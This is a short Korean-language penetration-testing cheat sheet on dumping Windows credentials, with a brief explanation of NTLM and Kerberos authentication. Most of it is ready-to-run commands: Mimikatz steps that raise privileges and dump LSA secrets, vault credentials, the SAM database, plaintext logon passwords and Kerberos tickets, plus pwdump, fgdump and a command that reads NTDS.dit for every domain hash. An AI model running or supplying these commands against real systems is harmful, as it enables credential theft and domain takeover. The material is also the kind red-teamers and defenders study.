NTLM 해시 및 평문 자격증명 덤프
NTLM 인증의 경우 Challenge-Response모델을 씀. 사용자 NTLM 해시로 암호화된 챌린지를 도메인 컨트롤러(DC)가 검증하는 방식.
Mimikatz로 LM/NTLM 해시 추출하기
전체 Mimikatz 가이드 로컬 관리자 권한 필요함
# 보안 토큰을 SYSTEM 권한으로 승격
mimikatz > privilege::debug
mimikatz > token::elevate
# NTLM 해시 및 평문 자격증명 덤프
mimikatz.exe lsadump::secrets "vault::cred /patch" lsadump::sam
mimikatz > lsadump::secrets
mimikatz > vault::cred /patch
mimikatz > lsadump::sam # 현재 호스트의 SAM DB 내용 덤프
mimikatz > sekurlsa::logonpasswords # 현재 로그인된 사용자 자격증명 덤프
기타 도구
cmd> pwdump.exe localhost
cmd> fgdump.exe localhost # pwdump 개선판, 방화벽 강제 종료 기능 포함
cmd> type C:\Windows\NTDS\NTDS.dit # 도메인 컨트롤러 내 NTDS.dit 파일의 전체 도메인 해시
Kerberos 티켓 덤프
커베로스 인증은 티켓 방식을 사용함. 도메인 컨트롤러(KDC 역할)가 발급해 준 TGT(Ticket Granting Ticket)를 써서 TGS(Ticket Granting Service)에 특정 리소스 접근용 티켓을 요청하는 구조.
해시는 LSASS(Local Security Authority Subsystem Service) 프로세스에 저장됨. LSASS가 SYSTEM 권한으로 돌기 때문에, 타겟에 저장된 해시를 뽑으려면 SYSTEM이나 로컬 관리자 권한이 필수.
Mimikatz로 Kerberos TGT/TGS 티켓 덤프
mimikatz > sekurlsa::tickets
덤프한 티켓 악용 기법은 "Service Account Attacks" 게시물 참고